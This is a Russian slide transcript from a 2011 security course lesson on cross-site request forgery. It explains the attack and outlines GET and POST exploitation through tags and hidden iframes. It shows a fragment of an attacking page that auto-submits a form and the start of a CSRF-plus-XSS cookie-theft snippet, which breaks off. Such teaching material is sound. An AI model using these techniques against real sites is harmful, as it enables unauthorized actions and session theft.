Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 2. Cross-site request forgery.

Презентация:



Advertisements
Похожие презентации
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты.
Advertisements

Тестирование безопасности или Security and Access Control Testing.
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 3. File Inclusion.
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 6. Автоматизация процесса поиска уязвимостей и их последующей эксплуатации.
Уязвимость сайтов и обеспечение их безопасности. Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации.
КУРС «WEB-ДИЗАЙН». Что такое Web-страница? То, что мы видим в окне браузера, когда заходим на какой-либо сайт! Мы видим веб-страницу сайта – ее содержимое!
HTML forms Материалы частично взяты с сайта
Месяц поиска уязвимостей Яндекса опыт участия Эльдар
Безопасный код © Александр Швец
КУРСОВОЙ ПРОЕКТ по дисциплине «ПРОГРАММНО-АППАРАТНАЯ ЗАЩИТА ИНФОРМАЦИИ» на тему «Фишинг как вид мошенничества» Выполнил студент группы 3881 Махонин А.Ю.
Лекция 11 Тема «Формы » Преподаватель: Халелова Е.Н.
Безопасность Веб-приложений Дмитрий Евтеев Эксперт по информационной безопасности.
ОСНОВНЫЕ ВИДЫ И ПРИЕМЫ ХАКЕРСКИХ АТАК Свидетель 3.
Открытое занятие по дисциплине «Web-программирование»
Сетевые черви и защита от них. СЕТЕВЫЕ ЧЕРВИ Сетевые черви - это вредоносные программы, которые проникают на компьютер, используя сервисы компьютерных.
Семинар 1С-Битрикс, 9 апреля 2009 г. Москва Современные web-уязвимости и угрозы для web-ресурсов Максим Фролов менеджер по интернет-решениям ЗАО Лаборатория.
О безопасности сайта думают в последнюю очередь! индивидуальные разработчики думают о безопасности сайтов в самую последнюю очередь клиенты не готовы платить.
Сбор открытых данных. Угрозы социальных сетей Выполнила студентка группы 3881 Жданова Маргарита.
Сравнительный анализ отправки сообщений через http и socket протоколы Подготовил:Хаванских В.В. МОУ СОШ 38, 10 В г. Воронеж Руководитель:Куракова Е.В.
РАСЧЕТ ROI В ИНТЕРНЕТ-МАРКЕТИНГ ПОСРЕДСТВОМ ВЕБ-АНАЛИТИКИ Артур Зотов.
Транксрипт:

Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 2. Cross-site request forgery

Отказ от ответственности Информация предоставлена исключительно в ознакомительных целях. Всю ответственность за использование и применение полученных знаний каждый участник берет на себя

Сross Site Request Forgery CSRF (англ. Сross Site Request Forgery «Подделка межсайтовых запросов», также известен как XSRF) Вид атак на посетителей веб-сайтов, использующий недостатки протокола HTTP. Если жертва заходит на сайт, созданный злоумышленником, от её лица тайно отправляется запрос на другой сервер (например, на сервер платёжной системы), осуществляющий некую вредоносную операцию (например, перевод денег на счёт злоумышленника). Для осуществления данной атаки, жертва должна быть авторизована на том сервере, на который отправляется запрос, и этот запрос не должен требовать какого- либо подтверждения со стороны пользователя, который не может быть проигнорирован или подделан атакующим скриптом. Угрозы – Произвольные действия на целевом сайте без авторизации (отправка сообщений, смена секретного пароля) – Кража cookie (CSRF + Passive XSS)

Проблема. Пример кода Отсутсвие проверок на то, что пользователь действительно сам отправил форму

Эксплуатация GET – Подставить (к примеру) тэг и указать в нем адрес с нужным нам действием на целевом сайте. Действие выполнится с cookie посетителя POST – Посредством iframe и формы с POST запросом, в которой указаны значения нужных нам полей

Содержимое атакующей страницы function submit_form(){ window.evilframe.document.forms[0].submit(); } Содержимое form.html

CSRF + XSS 1.Заполнить через CSRF уязвимое место к XSS на сайте скриптом вида img = new Image(); img.src = "

Почитать Атака – Защита –